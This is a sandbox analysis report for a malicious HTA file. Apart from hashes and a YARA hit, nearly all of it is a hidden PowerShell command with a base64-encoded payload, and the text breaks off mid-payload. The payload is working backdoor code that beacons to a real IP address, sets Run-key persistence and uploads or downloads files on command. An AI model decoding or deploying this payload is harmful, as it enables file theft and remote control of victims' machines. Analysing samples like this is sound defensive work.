Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 1, 2023, 7:53 p.m.	June 1, 2023, 7:55 p.m.

Size	19.8KB
Type	HTML document, ASCII text, with very long lines
MD5	`9b78bbb925f4d5e4fb3b19b1962674b9`
SHA256	`59c04be1dd57909128065639ac22c840e0f7de4b7d115a881594b2771f8ea253`
CRC32	`89611E4A`
ssdeep	`384:Y+Gn948+gKC/5vhcAbaVD6hBGOJstYEGwvctaheTupw9IglFAbaVD6hBGdYw6hjJ:An9GQhmsnBGOEG0ctwHpdUFsnBGdxQqW`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\1.html.hta
3028
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA0ADsAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAAgAD0AIAAxADAAMgA0ACAAKgAgADEAMAAyADQAOwAkAEUAVgBQACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAA9ACAAJwBoAHQAdABwADoALwAvADEANwAyAC4AOQAzAC4AMQA4ADEALgAyADQAOQAvAGMAbwBuAHQAcgBvAGwALwBjAG8AbQAuAHAAaABwACcAIAArACAAJwA/AFUAPQAnACAAKwAgACQARQBWAFAAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAEMATABQAFQATQBkAEcAdgBpAE8ASABmAFQATAAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABKAFEAUQB3AEUAIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAANAA3ADQANAA2ADUAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADkAMwAuADEAOAAxAC4AMgA0ADkALwBjAG8AbgB0AHIAbwBsAC8AaAB0AG0AbAAvADEALgBoAHQAbQBsACcAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAZgBwAEIAYgAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJABsAG8AbwBBAE0ASQBtAEkASwApAHsAJABUAEEAQwBLAHMAWABWAE4AcwBTACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAbwBvAEEATQBJAG0ASQBLACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABUAEEAQwBLAHMAWABWAE4AcwBTAC4ATABlAG4AZwB0AGgAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAFQAQQBDAEsAcwBYAFYATgBzAFMALAAgADAALAAgACQAVABBAEMASwBzAFgAVgBOAHMAUwAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwByAGUAdAB1AHIAbgAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdgBTAGwAbwBiAFYAbAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYALAAgACQARABiAEMALAAgACQAeABQAGIAdwBqAHQAUwBhAHAAVABJAEIAKQB7ACQAVABpAG0AZQBvAHUAdAA9ADEAMAAwADAAMAAwADAAMAA7ACQAQwBSAEwARgAgAD0AIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEQAKQAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEEAKQA7ACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgAD0AIAAnAC0ALQAnADsAJABCAG8AdQBuAGQAYQByAHkAIAA9ACAAJwAqACoAKgAqACoAJwA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJAByAE8AdQBNAEYAKQA7ACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEALAAwACwAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAApACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAFQAaQBtAGUAbwB1AHQAIAA9ACAAJABUAGkAbQBlAG8AdQB0ADsAJABnAFIATABRAGEAdABHAG8AaQBpAGYAZABVAFQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVACAAPQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAGgAZQBhAGQAaQBuAGcAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAQwBSAEwARgApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQARABiAEMAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AFAAYgB3AGoAdABTAGEAcABUAEkAQgAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADMALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAzAC4ATABlAG4AZwB0AGgAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABDAFYAUgBxAHcAdQBmAEEAZABDAE4AcQAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9ACQAcwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABoAFUAYgBVAFcAawBaAGIAWAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAcgBPAHUATQBGACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAAPQAgAGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACcAJwA7AEkAZgAgACgAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAIAAtAG4AZQAgACcAJwApAHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAD0AJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEALgBMAGUAbgBnAHQAaAAgAC0AIAAyACkAOwAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAKQApADsAaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACkAewBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAKQB7ACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUAAgACsAIAAnAC4AYwBzAHYAJwA7AEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQACAAKwAgACcALgB6AGkAcAAnADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGQAaQByACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAPQAgACcAXwBmAGkAbABlACcAOwAkAG4AbwB3AHQAaQBtAGUAIAA9ACAARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkALQBNAE0ALQBkAGQAXwBIAEgAXwBtAG0AXwBzAHMAOwAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABuAG8AdwB0AGkAbQBlACAAKwAgACcAXwBmAGkAbABlACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AGgAVQBiAFUAVwBrAFoAYgBYACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEAR